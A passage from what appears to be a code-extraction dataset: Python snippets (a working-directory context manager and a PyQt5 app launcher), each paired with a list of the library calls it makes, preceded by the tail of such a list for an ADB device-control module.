] | [((529, 568), 'PIL.Image.frombytes', 'Image.frombytes', (['"""RGBA"""', '(w, h)', 'pixels'], {}), "('RGBA', (w, h), pixels)\n", (544, 568), False, 'from PIL import Image\n'), ((684, 705), 'PIL.Image.open', 'Image.open', (['imgorfile'], {}), '(imgorfile)\n', (694, 705), False, 'from PIL import Image\n'), ((1186, 1223), 'config.get', 'config.get', (['"""device/adb_binary"""', 'None'], {}), "('device/adb_binary', None)\n", (1196, 1223), False, 'import config\n'), ((2199, 2242), 'config.get', 'config.get', (['"""device/cache_screenshot"""', '(True)'], {}), "('device/cache_screenshot', True)\n", (2209, 2242), False, 'import config\n'), ((2376, 2429), 'config.get', 'config.get', (['"""device/try_emulator_enhanced_mode"""', '(True)'], {}), "('device/try_emulator_enhanced_mode', True)\n", (2386, 2429), False, 'import config\n'), ((3796, 3844), 'config.get', 'config.get', (['"""device/adb_always_use_device"""', 'None'], {}), "('device/adb_always_use_device', None)\n", (3806, 3844), False, 'import config\n'), ((6688, 6707), 'util.socketutil.recvall', 'recvall', (['s', '(4194304)'], {}), '(s, 4194304)\n', (6695, 6707), False, 'from util.socketutil import recvall\n'), ((6925, 6944), 'util.socketutil.recvall', 'recvall', (['s', '(4194304)'], {}), '(s, 4194304)\n', (6932, 6944), False, 'from util.socketutil import recvall\n'), ((6978, 7029), 'zlib.decompress', 'zlib.decompress', (['data', '(zlib.MAX_WBITS | 16)', '(8388608)'], {}), '(data, zlib.MAX_WBITS | 16, 8388608)\n', (6993, 7029), False, 'import zlib\n'), ((7048, 7082), 'struct.unpack_from', 'struct.unpack_from', (['"""III"""', 'data', '(0)'], {}), "('III', data, 0)\n", (7066, 7082), False, 'import struct\n'), ((7644, 7678), 'struct.unpack_from', 'struct.unpack_from', (['"""III"""', 'data', '(0)'], {}), "('III', data, 0)\n", (7662, 7678), False, 'import struct\n'), ((7799, 7815), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (7813, 7815), False, 'import time\n'), ((8115, 8131), 'time.monotonic', 'time.monotonic', ([], {}), '()\n', (8129, 8131), False, 'import time\n'), ((1278, 1314), 'os.path.join', 'os.path.join', (['config.ADB_ROOT', '"""adb"""'], {}), "(config.ADB_ROOT, 'adb')\n", (1290, 1314), False, 'import os\n'), ((1461, 1513), 'subprocess.run', 'subprocess.run', (["[adbbin, 'start-server']"], {'check': '(True)'}), "([adbbin, 'start-server'], check=True)\n", (1475, 1513), False, 'import subprocess\n'), ((3257, 3300), 'config.get', 'config.get', (['"""device/adb_auto_connect"""', 'None'], {}), "('device/adb_auto_connect', None)\n", (3267, 3300), False, 'import config\n'), ((8872, 8904), 'random.randint', 'randint', (['(-offsets[0])', 'offsets[0]'], {}), '(-offsets[0], offsets[0])\n', (8879, 8904), False, 'from random import randint\n'), ((8935, 8967), 'random.randint', 'randint', (['(-offsets[1])', 'offsets[1]'], {}), '(-offsets[1], offsets[1])\n', (8942, 8967), False, 'from random import randint\n'), ((9012, 9026), 'random.randint', 'randint', (['(-1)', '(1)'], {}), '(-1, 1)\n', (9019, 9026), False, 'from random import randint\n'), ((9057, 9071), 'random.randint', 'randint', (['(-1)', '(1)'], {}), '(-1, 1)\n', (9064, 9071), False, 'from random import randint\n'), ((7597, 7625), 'util.socketutil.recvall', 'recvall', (['conn', '(8388608)', '(True)'], {}), '(conn, 8388608, True)\n', (7604, 7625), False, 'from util.socketutil import recvall\n'), ((6260, 6273), 'util.socketutil.recvall', 'recvall', (['conn'], {}), '(conn)\n', (6267, 6273), False, 'from util.socketutil import recvall\n')] |
import inspect
import os
from pathlib import Path
class change_directory:
"""
A class for changing the working directory using a "with" statement.
It takes the directory to change to as an argument. If no directory is given,
it takes the directory of the file from which this function was called.
"""
def __init__(self, directory: str = None) -> None:
self.old_dir = os.getcwd()
if directory is None:
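            # stack()[1] is the caller's frame; default to the directory of the file that called us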
self.new_dir = Path(inspect.getabsfile(inspect.stack()[1][0])).parent # type: ignore
else:
self.new_dir = directory
def __enter__(self, *_) -> None:
os.chdir(self.new_dir)
def __exit__(self, *_) -> None:
os.chdir(self.old_dir)
| [
"os.chdir",
"inspect.stack",
"os.getcwd"
] | [((415, 426), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (424, 426), False, 'import os\n'), ((659, 681), 'os.chdir', 'os.chdir', (['self.new_dir'], {}), '(self.new_dir)\n', (667, 681), False, 'import os\n'), ((730, 752), 'os.chdir', 'os.chdir', (['self.old_dir'], {}), '(self.old_dir)\n', (738, 752), False, 'import os\n'), ((510, 525), 'inspect.stack', 'inspect.stack', ([], {}), '()\n', (523, 525), False, 'import inspect\n')] |
import sys
from PyQt5.QtWidgets import QApplication
from gui import MgallManager
def main():
app = QApplication(sys.argv)
ex = MgallManager()
app.aboutToQuit.connect(ex.ExitHandler)
sys.exit(app.exec_())
if __name__ == "__main__":
main()
| [
"gui.MgallManager",
"PyQt5.QtWidgets.QApplication"
] | [((106, 128), 'PyQt5.QtWidgets.QApplication', 'QApplication', (['sys.argv'], {}), '(sys.argv)\n', (118, 128), False, 'from PyQt5.QtWidgets import QApplication\n'), ((138, 152), 'gui.MgallManager', 'MgallManager', ([], {}), '()\n', (150, 152), False, 'from gui import MgallManager\n')] |